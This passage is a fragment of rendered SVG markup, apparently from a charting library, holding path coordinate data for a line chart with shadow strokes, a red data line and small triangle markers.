L 260.62132352941177 210.86108705066664 L 262.1493566176471 210.86108705066664 L 263.6773897058824 210.86108705066664 L 265.2054227941177 210.86108705066664 L 266.7334558823529 210.86108705066664 L 268.26148897058823 210.86108705066664 L 269.78952205882354 210.86108705066664 L 271.31755514705884 210.86108705066664 L 272.84558823529414 210.86108705066664 L 274.37362132352945 210.86108705066664 L 275.9016544117647 210.86108705066664 L 277.4296875 210.86108705066664 L 278.9577205882353 210.86108705066664 L 280.4857536764706 210.86108705066664 L 282.0137867647059 210.86108705066664 L 283.54181985294116 210.86108705066664 L 285.06985294117646 210.86108705066664 L 286.59788602941177 210.86108705066664 L 288.1259191176471 210.86108705066664 L 289.6539522058824 210.86108705066664 L 291.1819852941177 210.86108705066664 L 292.7100183823529 210.86108705066664 L 294.23805147058823 210.86108705066664 L 295.76608455882354 210.86108705066664 L 297.29411764705884 210.86108705066664 L 298.82215073529414 210.86108705066664 L 300.35018382352945 210.86108705066664 L 301.8782169117647 210.86108705066664 L 303.40625 210.62592570666675 L 304.9342830882353 210.62592570666675 L 306.4623161764706 210.61216762666675 L 307.9903492647059 210.61216762666675 L 309.51838235294116 210.52388661333362 L 311.04641544117646 210.3052254933336 L 312.57444852941177 208.7924997333336 L 314.1024816176471 207.36234731733362 L 315.6305147058824 205.1514404373336 L 317.1585477941177 203.7417226773336 L 318.6865808823529 202.3316461653336 L 320.21461397058823 200.9224967253336 L 321.74264705882354 199.2784890453336 L 323.27068014705884 195.1232528853336 L 324.79871323529414 195.1232528853336 L 326.32674632352945 195.1232528853336 L 327.8547794117647 195.1232528853336 L 329.3828125 195.1232528853336 L 330.9108455882353 195.1232528853336 L 332.4388786764706 193.7653303893336 L 333.9669117647059 192.33677755733243 L 335.4949448529412 190.20356436266377 L 337.02297794117646 189.8794088426638 L 338.55101102941177 187.7975658559975 L 340.0790441176471 185.8471981759975 L 341.6070772058824 183.48582857599752 L 343.1351102941177 179.5350100159975 L 344.6631433823529 179.1702196159975 L 346.19117647058823 176.47069961599752 L 347.71920955882354 171.9355060159975 L 349.24724264705884 168.03867785599752 L 350.77527573529414 166.8063469759975 L 352.30330882352945 164.63820617599748 L 353.8313419117647 163.18621961599752 L 355.359375 161.34628361599752 L 356.8874080882353 161.2652103999975 L 358.4154411764706 161.0903572799975 L 359.9434742647059 158.36497871999748 L 361.4715073529412 155.8299163199975 L 362.99954044117646 153.14236655999747 L 364.52757352941177 150.87535583999747 L 366.0556066176471 150.87535583999747 L 367.5836397058824 149.06984977066423 L 369.1116727941177 144.84877137066425 L 370.6397058823529 143.97412689066422 L 372.16773897058823 138.53459409066423 L 373.69577205882354 136.6388561706642 L 375.22380514705884 134.6385118506642 L 376.75183823529414 133.2280126506642 L 378.27987132352945 129.9197508906642 L 379.8079044117647 129.9197508906642 L 381.3359375 129.9197508906642 L 382.8639705882353 127.37342865066421 L 384.3920036764706 125.21743569066422 L 385.9200367647059 124.13492817066421 L 387.4480698529412 122.84320785066421 L 388.97610294117646 122.47195281066419 L 390.50413602941177 122.47195281066419 L 392.0321691176471 122.47195281066419 L 393.5602022058824 122.47195281066419 L 395.0882352941177 122.47195281066419" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.8 L 136.85064338235296 236.8 L 138.37867647058823 236.8 L 139.90670955882354 236.8 L 141.43474264705884 236.8 L 142.96277573529412 236.8 L 144.49080882352942 236.8 L 146.01884191176472 236.8 L 147.546875 236.8 L 149.0749080882353 236.8 L 150.6029411764706 236.8 L 152.13097426470588 236.8 L 153.6590073529412 236.8 L 155.18704044117646 236.8 L 156.71507352941177 236.8 L 158.24310661764707 236.8 L 159.77113970588235 236.8 L 161.29917279411765 236.8 L 162.82720588235296 236.8 L 164.35523897058823 236.8 L 165.88327205882354 236.8 L 167.41130514705884 236.8 L 168.93933823529412 236.8 L 170.46737132352942 236.8 L 171.99540441176472 236.8 L 173.5234375 236.8 L 175.0514705882353 236.8 L 176.5795036764706 236.8 L 178.10753676470588 231.05474656 L 179.6355698529412 231.05474656 L 181.1636029411765 231.05474656 L 182.69163602941177 231.05474656 L 184.21966911764707 231.05474656 L 185.74770220588235 231.05474656 L 187.27573529411765 231.05474656 L 188.80376838235296 231.05474656 L 190.33180147058823 231.05474656 L 191.85983455882354 231.05474656 L 193.38786764705884 231.05474656 L 194.91590073529412 226.19561055999998 L 196.44393382352942 224.31216256 L 197.97196691176472 222.151541344 L 199.5 219.24145878399997 L 201.0280330882353 216.05062614399998 L 202.5560661764706 212.47699841066662 L 204.08409926470588 212.47699841066662 L 205.6121323529412 212.47699841066662 L 207.1401654411765 212.47699841066662 L 208.66819852941177 212.47699841066662 L 210.19623161764707 212.47699841066662 L 211.72426470588235 212.47699841066662 L 213.25229779411765 212.47699841066662 L 214.78033088235296 212.47699841066662 L 216.30836397058823 212.47699841066662 L 217.83639705882354 212.04237569066663 L 219.36443014705884 212.04237569066663 L 220.89246323529412 212.04237569066663 L 222.42049632352942 212.04237569066663 L 223.94852941176472 212.04237569066663 L 225.4765625 212.04237569066663 L 227.0045955882353 212.04237569066663 L 228.5326286764706 212.04237569066663 L 230.06066176470588 211.90512641066664 L 231.5886948529412 210.86108705066664 L 233.1167279411765 210.86108705066664 L 234.64476102941177 210.86108705066664 L 236.17279411764707 210.86108705066664 L 237.70082720588238 210.86108705066664 L 239.22886029411765 210.86108705066664 L 240.75689338235296 210.86108705066664 L 242.28492647058823 210.86108705066664 L 243.81295955882354 210.86108705066664 L 245.34099264705884 210.86108705066664 L 246.86902573529412 210.86108705066664 L 248.39705882352942 210.86108705066664 L 249.92509191176472 210.86108705066664 L 251.453125 210.86108705066664 L 252.9811580882353 210.86108705066664 L 254.5091911764706 210.86108705066664 L 256.0372242647059 210.86108705066664 L 257.56525735294116 210.86108705066664 L 259.09329044117646 210.86108705066664 L 260.62132352941177 210.86108705066664 L 262.1493566176471 210.86108705066664 L 263.6773897058824 210.86108705066664 L 265.2054227941177 210.86108705066664 L 266.7334558823529 210.86108705066664 L 268.26148897058823 210.86108705066664 L 269.78952205882354 210.86108705066664 L 271.31755514705884 210.86108705066664 L 272.84558823529414 210.86108705066664 L 274.37362132352945 210.86108705066664 L 275.9016544117647 210.86108705066664 L 277.4296875 210.86108705066664 L 278.9577205882353 210.86108705066664 L 280.4857536764706 210.86108705066664 L 282.0137867647059 210.86108705066664 L 283.54181985294116 210.86108705066664 L 285.06985294117646 210.86108705066664 L 286.59788602941177 210.86108705066664 L 288.1259191176471 210.86108705066664 L 289.6539522058824 210.86108705066664 L 291.1819852941177 210.86108705066664 L 292.7100183823529 210.86108705066664 L 294.23805147058823 210.86108705066664 L 295.76608455882354 210.86108705066664 L 297.29411764705884 210.86108705066664 L 298.82215073529414 210.86108705066664 L 300.35018382352945 210.86108705066664 L 301.8782169117647 210.86108705066664 L 303.40625 210.62592570666675 L 304.9342830882353 210.62592570666675 L 306.4623161764706 210.61216762666675 L 307.9903492647059 210.61216762666675 L 309.51838235294116 210.52388661333362 L 311.04641544117646 210.3052254933336 L 312.57444852941177 208.7924997333336 L 314.1024816176471 207.36234731733362 L 315.6305147058824 205.1514404373336 L 317.1585477941177 203.7417226773336 L 318.6865808823529 202.3316461653336 L 320.21461397058823 200.9224967253336 L 321.74264705882354 199.2784890453336 L 323.27068014705884 195.1232528853336 L 324.79871323529414 195.1232528853336 L 326.32674632352945 195.1232528853336 L 327.8547794117647 195.1232528853336 L 329.3828125 195.1232528853336 L 330.9108455882353 195.1232528853336 L 332.4388786764706 193.7653303893336 L 333.9669117647059 192.33677755733243 L 335.4949448529412 190.20356436266377 L 337.02297794117646 189.8794088426638 L 338.55101102941177 187.7975658559975 L 340.0790441176471 185.8471981759975 L 341.6070772058824 183.48582857599752 L 343.1351102941177 179.5350100159975 L 344.6631433823529 179.1702196159975 L 346.19117647058823 176.47069961599752 L 347.71920955882354 171.9355060159975 L 349.24724264705884 168.03867785599752 L 350.77527573529414 166.8063469759975 L 352.30330882352945 164.63820617599748 L 353.8313419117647 163.18621961599752 L 355.359375 161.34628361599752 L 356.8874080882353 161.2652103999975 L 358.4154411764706 161.0903572799975 L 359.9434742647059 158.36497871999748 L 361.4715073529412 155.8299163199975 L 362.99954044117646 153.14236655999747 L 364.52757352941177 150.87535583999747 L 366.0556066176471 150.87535583999747 L 367.5836397058824 149.06984977066423 L 369.1116727941177 144.84877137066425 L 370.6397058823529 143.97412689066422 L 372.16773897058823 138.53459409066423 L 373.69577205882354 136.6388561706642 L 375.22380514705884 134.6385118506642 L 376.75183823529414 133.2280126506642 L 378.27987132352945 129.9197508906642 L 379.8079044117647 129.9197508906642 L 381.3359375 129.9197508906642 L 382.8639705882353 127.37342865066421 L 384.3920036764706 125.21743569066422 L 385.9200367647059 124.13492817066421 L 387.4480698529412 122.84320785066421 L 388.97610294117646 122.47195281066419 L 390.50413602941177 122.47195281066419 L 392.0321691176471 122.47195281066419 L 393.5602022058824 122.47195281066419 L 395.0882352941177 122.47195281066419" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.8 L 136.85064338235296 236.8 L 138.37867647058823 236.8 L 139.90670955882354 236.8 L 141.43474264705884 236.8 L 142.96277573529412 236.8 L 144.49080882352942 236.8 L 146.01884191176472 236.8 L 147.546875 236.8 L 149.0749080882353 236.8 L 150.6029411764706 236.8 L 152.13097426470588 236.8 L 153.6590073529412 236.8 L 155.18704044117646 236.8 L 156.71507352941177 236.8 L 158.24310661764707 236.8 L 159.77113970588235 236.8 L 161.29917279411765 236.8 L 162.82720588235296 236.8 L 164.35523897058823 236.8 L 165.88327205882354 236.8 L 167.41130514705884 236.8 L 168.93933823529412 236.8 L 170.46737132352942 236.8 L 171.99540441176472 236.8 L 173.5234375 236.8 L 175.0514705882353 236.8 L 176.5795036764706 236.8 L 178.10753676470588 231.05474656 L 179.6355698529412 231.05474656 L 181.1636029411765 231.05474656 L 182.69163602941177 231.05474656 L 184.21966911764707 231.05474656 L 185.74770220588235 231.05474656 L 187.27573529411765 231.05474656 L 188.80376838235296 231.05474656 L 190.33180147058823 231.05474656 L 191.85983455882354 231.05474656 L 193.38786764705884 231.05474656 L 194.91590073529412 226.19561055999998 L 196.44393382352942 224.31216256 L 197.97196691176472 222.151541344 L 199.5 219.24145878399997 L 201.0280330882353 216.05062614399998 L 202.5560661764706 212.47699841066662 L 204.08409926470588 212.47699841066662 L 205.6121323529412 212.47699841066662 L 207.1401654411765 212.47699841066662 L 208.66819852941177 212.47699841066662 L 210.19623161764707 212.47699841066662 L 211.72426470588235 212.47699841066662 L 213.25229779411765 212.47699841066662 L 214.78033088235296 212.47699841066662 L 216.30836397058823 212.47699841066662 L 217.83639705882354 212.04237569066663 L 219.36443014705884 212.04237569066663 L 220.89246323529412 212.04237569066663 L 222.42049632352942 212.04237569066663 L 223.94852941176472 212.04237569066663 L 225.4765625 212.04237569066663 L 227.0045955882353 212.04237569066663 L 228.5326286764706 212.04237569066663 L 230.06066176470588 211.90512641066664 L 231.5886948529412 210.86108705066664 L 233.1167279411765 210.86108705066664 L 234.64476102941177 210.86108705066664 L 236.17279411764707 210.86108705066664 L 237.70082720588238 210.86108705066664 L 239.22886029411765 210.86108705066664 L 240.75689338235296 210.86108705066664 L 242.28492647058823 210.86108705066664 L 243.81295955882354 210.86108705066664 L 245.34099264705884 210.86108705066664 L 246.86902573529412 210.86108705066664 L 248.39705882352942 210.86108705066664 L 249.92509191176472 210.86108705066664 L 251.453125 210.86108705066664 L 252.9811580882353 210.86108705066664 L 254.5091911764706 210.86108705066664 L 256.0372242647059 210.86108705066664 L 257.56525735294116 210.86108705066664 L 259.09329044117646 210.86108705066664 L 260.62132352941177 210.86108705066664 L 262.1493566176471 210.86108705066664 L 263.6773897058824 210.86108705066664 L 265.2054227941177 210.86108705066664 L 266.7334558823529 210.86108705066664 L 268.26148897058823 210.86108705066664 L 269.78952205882354 210.86108705066664 L 271.31755514705884 210.86108705066664 L 272.84558823529414 210.86108705066664 L 274.37362132352945 210.86108705066664 L 275.9016544117647 210.86108705066664 L 277.4296875 210.86108705066664 L 278.9577205882353 210.86108705066664 L 280.4857536764706 210.86108705066664 L 282.0137867647059 210.86108705066664 L 283.54181985294116 210.86108705066664 L 285.06985294117646 210.86108705066664 L 286.59788602941177 210.86108705066664 L 288.1259191176471 210.86108705066664 L 289.6539522058824 210.86108705066664 L 291.1819852941177 210.86108705066664 L 292.7100183823529 210.86108705066664 L 294.23805147058823 210.86108705066664 L 295.76608455882354 210.86108705066664 L 297.29411764705884 210.86108705066664 L 298.82215073529414 210.86108705066664 L 300.35018382352945 210.86108705066664 L 301.8782169117647 210.86108705066664 L 303.40625 210.62592570666675 L 304.9342830882353 210.62592570666675 L 306.4623161764706 210.61216762666675 L 307.9903492647059 210.61216762666675 L 309.51838235294116 210.52388661333362 L 311.04641544117646 210.3052254933336 L 312.57444852941177 208.7924997333336 L 314.1024816176471 207.36234731733362 L 315.6305147058824 205.1514404373336 L 317.1585477941177 203.7417226773336 L 318.6865808823529 202.3316461653336 L 320.21461397058823 200.9224967253336 L 321.74264705882354 199.2784890453336 L 323.27068014705884 195.1232528853336 L 324.79871323529414 195.1232528853336 L 326.32674632352945 195.1232528853336 L 327.8547794117647 195.1232528853336 L 329.3828125 195.1232528853336 L 330.9108455882353 195.1232528853336 L 332.4388786764706 193.7653303893336 L 333.9669117647059 192.33677755733243 L 335.4949448529412 190.20356436266377 L 337.02297794117646 189.8794088426638 L 338.55101102941177 187.7975658559975 L 340.0790441176471 185.8471981759975 L 341.6070772058824 183.48582857599752 L 343.1351102941177 179.5350100159975 L 344.6631433823529 179.1702196159975 L 346.19117647058823 176.47069961599752 L 347.71920955882354 171.9355060159975 L 349.24724264705884 168.03867785599752 L 350.77527573529414 166.8063469759975 L 352.30330882352945 164.63820617599748 L 353.8313419117647 163.18621961599752 L 355.359375 161.34628361599752 L 356.8874080882353 161.2652103999975 L 358.4154411764706 161.0903572799975 L 359.9434742647059 158.36497871999748 L 361.4715073529412 155.8299163199975 L 362.99954044117646 153.14236655999747 L 364.52757352941177 150.87535583999747 L 366.0556066176471 150.87535583999747 L 367.5836397058824 149.06984977066423 L 369.1116727941177 144.84877137066425 L 370.6397058823529 143.97412689066422 L 372.16773897058823 138.53459409066423 L 373.69577205882354 136.6388561706642 L 375.22380514705884 134.6385118506642 L 376.75183823529414 133.2280126506642 L 378.27987132352945 129.9197508906642 L 379.8079044117647 129.9197508906642 L 381.3359375 129.9197508906642 L 382.8639705882353 127.37342865066421 L 384.3920036764706 125.21743569066422 L 385.9200367647059 124.13492817066421 L 387.4480698529412 122.84320785066421 L 388.97610294117646 122.47195281066419 L 390.50413602941177 122.47195281066419 L 392.0321691176471 122.47195281066419 L 393.5602022058824 122.47195281066419 L 395.0882352941177 122.47195281066419" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.8 L 136.85064338235296 236.8 L 138.37867647058823 236.8 L 139.90670955882354 236.8 L 141.43474264705884 236.8 L 142.96277573529412 236.8 L 144.49080882352942 236.8 L 146.01884191176472 236.8 L 147.546875 236.8 L 149.0749080882353 236.8 L 150.6029411764706 236.8 L 152.13097426470588 236.8 L 153.6590073529412 236.8 L 155.18704044117646 236.8 L 156.71507352941177 236.8 L 158.24310661764707 236.8 L 159.77113970588235 236.8 L 161.29917279411765 236.8 L 162.82720588235296 236.8 L 164.35523897058823 236.8 L 165.88327205882354 236.8 L 167.41130514705884 236.8 L 168.93933823529412 236.8 L 170.46737132352942 236.8 L 171.99540441176472 236.8 L 173.5234375 236.8 L 175.0514705882353 236.8 L 176.5795036764706 236.8 L 178.10753676470588 231.05474656 L 179.6355698529412 231.05474656 L 181.1636029411765 231.05474656 L 182.69163602941177 231.05474656 L 184.21966911764707 231.05474656 L 185.74770220588235 231.05474656 L 187.27573529411765 231.05474656 L 188.80376838235296 231.05474656 L 190.33180147058823 231.05474656 L 191.85983455882354 231.05474656 L 193.38786764705884 231.05474656 L 194.91590073529412 226.19561055999998 L 196.44393382352942 224.31216256 L 197.97196691176472 222.151541344 L 199.5 219.24145878399997 L 201.0280330882353 216.05062614399998 L 202.5560661764706 212.47699841066662 L 204.08409926470588 212.47699841066662 L 205.6121323529412 212.47699841066662 L 207.1401654411765 212.47699841066662 L 208.66819852941177 212.47699841066662 L 210.19623161764707 212.47699841066662 L 211.72426470588235 212.47699841066662 L 213.25229779411765 212.47699841066662 L 214.78033088235296 212.47699841066662 L 216.30836397058823 212.47699841066662 L 217.83639705882354 212.04237569066663 L 219.36443014705884 212.04237569066663 L 220.89246323529412 212.04237569066663 L 222.42049632352942 212.04237569066663 L 223.94852941176472 212.04237569066663 L 225.4765625 212.04237569066663 L 227.0045955882353 212.04237569066663 L 228.5326286764706 212.04237569066663 L 230.06066176470588 211.90512641066664 L 231.5886948529412 210.86108705066664 L 233.1167279411765 210.86108705066664 L 234.64476102941177 210.86108705066664 L 236.17279411764707 210.86108705066664 L 237.70082720588238 210.86108705066664 L 239.22886029411765 210.86108705066664 L 240.75689338235296 210.86108705066664 L 242.28492647058823 210.86108705066664 L 243.81295955882354 210.86108705066664 L 245.34099264705884 210.86108705066664 L 246.86902573529412 210.86108705066664 L 248.39705882352942 210.86108705066664 L 249.92509191176472 210.86108705066664 L 251.453125 210.86108705066664 L 252.9811580882353 210.86108705066664 L 254.5091911764706 210.86108705066664 L 256.0372242647059 210.86108705066664 L 257.56525735294116 210.86108705066664 L 259.09329044117646 210.86108705066664 L 260.62132352941177 210.86108705066664 L 262.1493566176471 210.86108705066664 L 263.6773897058824 210.86108705066664 L 265.2054227941177 210.86108705066664 L 266.7334558823529 210.86108705066664 L 268.26148897058823 210.86108705066664 L 269.78952205882354 210.86108705066664 L 271.31755514705884 210.86108705066664 L 272.84558823529414 210.86108705066664 L 274.37362132352945 210.86108705066664 L 275.9016544117647 210.86108705066664 L 277.4296875 210.86108705066664 L 278.9577205882353 210.86108705066664 L 280.4857536764706 210.86108705066664 L 282.0137867647059 210.86108705066664 L 283.54181985294116 210.86108705066664 L 285.06985294117646 210.86108705066664 L 286.59788602941177 210.86108705066664 L 288.1259191176471 210.86108705066664 L 289.6539522058824 210.86108705066664 L 291.1819852941177 210.86108705066664 L 292.7100183823529 210.86108705066664 L 294.23805147058823 210.86108705066664 L 295.76608455882354 210.86108705066664 L 297.29411764705884 210.86108705066664 L 298.82215073529414 210.86108705066664 L 300.35018382352945 210.86108705066664 L 301.8782169117647 210.86108705066664 L 303.40625 210.62592570666675 L 304.9342830882353 210.62592570666675 L 306.4623161764706 210.61216762666675 L 307.9903492647059 210.61216762666675 L 309.51838235294116 210.52388661333362 L 311.04641544117646 210.3052254933336 L 312.57444852941177 208.7924997333336 L 314.1024816176471 207.36234731733362 L 315.6305147058824 205.1514404373336 L 317.1585477941177 203.7417226773336 L 318.6865808823529 202.3316461653336 L 320.21461397058823 200.9224967253336 L 321.74264705882354 199.2784890453336 L 323.27068014705884 195.1232528853336 L 324.79871323529414 195.1232528853336 L 326.32674632352945 195.1232528853336 L 327.8547794117647 195.1232528853336 L 329.3828125 195.1232528853336 L 330.9108455882353 195.1232528853336 L 332.4388786764706 193.7653303893336 L 333.9669117647059 192.33677755733243 L 335.4949448529412 190.20356436266377 L 337.02297794117646 189.8794088426638 L 338.55101102941177 187.7975658559975 L 340.0790441176471 185.8471981759975 L 341.6070772058824 183.48582857599752 L 343.1351102941177 179.5350100159975 L 344.6631433823529 179.1702196159975 L 346.19117647058823 176.47069961599752 L 347.71920955882354 171.9355060159975 L 349.24724264705884 168.03867785599752 L 350.77527573529414 166.8063469759975 L 352.30330882352945 164.63820617599748 L 353.8313419117647 163.18621961599752 L 355.359375 161.34628361599752 L 356.8874080882353 161.2652103999975 L 358.4154411764706 161.0903572799975 L 359.9434742647059 158.36497871999748 L 361.4715073529412 155.8299163199975 L 362.99954044117646 153.14236655999747 L 364.52757352941177 150.87535583999747 L 366.0556066176471 150.87535583999747 L 367.5836397058824 149.06984977066423 L 369.1116727941177 144.84877137066425 L 370.6397058823529 143.97412689066422 L 372.16773897058823 138.53459409066423 L 373.69577205882354 136.6388561706642 L 375.22380514705884 134.6385118506642 L 376.75183823529414 133.2280126506642 L 378.27987132352945 129.9197508906642 L 379.8079044117647 129.9197508906642 L 381.3359375 129.9197508906642 L 382.8639705882353 127.37342865066421 L 384.3920036764706 125.21743569066422 L 385.9200367647059 124.13492817066421 L 387.4480698529412 122.84320785066421 L 388.97610294117646 122.47195281066419 L 390.50413602941177 122.47195281066419 L 392.0321691176471 122.47195281066419 L 393.5602022058824 122.47195281066419 L 395.0882352941177 122.47195281066419" fill="none" stroke="#DF5353" stroke-width="2"></path><path d="M 395 117.18 L 399 125.18 391 125.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 393.5 117.18 L 397.5 125.18 389.5 125.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 392 117.18 L 396 125.18 388 125.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 390.5 117.18 L 394.5 125.18 386.5 125.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 389 117.18 L 393 125.18 385 125.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 387.5 117.68 L 391.5 125.68 383.5 125.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 386 118.68 L 390 126.68 382 126.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 384.5 119.68 L 388.5 127.68 380.5 127.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 383 122.18 L 387 130.18 379 130.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 381.5 124.68 L 385.5 132.68 377.5 132.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 380 124.68 L 384 132.68 376 132.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 378.5 124.68 L 382.5 132.68 374.5 132.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 377 127.68 L 381 135.68 373 135.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 375 129.18 L 379 137.18 371 137.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 373.5 